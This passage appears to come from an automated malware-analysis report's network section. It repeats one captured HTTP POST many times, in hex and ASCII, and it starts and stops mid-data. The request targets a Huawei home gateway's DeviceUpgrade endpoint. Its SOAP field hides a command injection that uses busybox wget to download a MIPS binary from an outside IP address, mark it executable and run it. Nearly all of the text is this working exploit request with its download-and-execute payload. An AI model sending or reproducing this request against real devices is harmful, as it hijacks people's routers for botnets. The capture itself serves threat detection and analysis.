64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 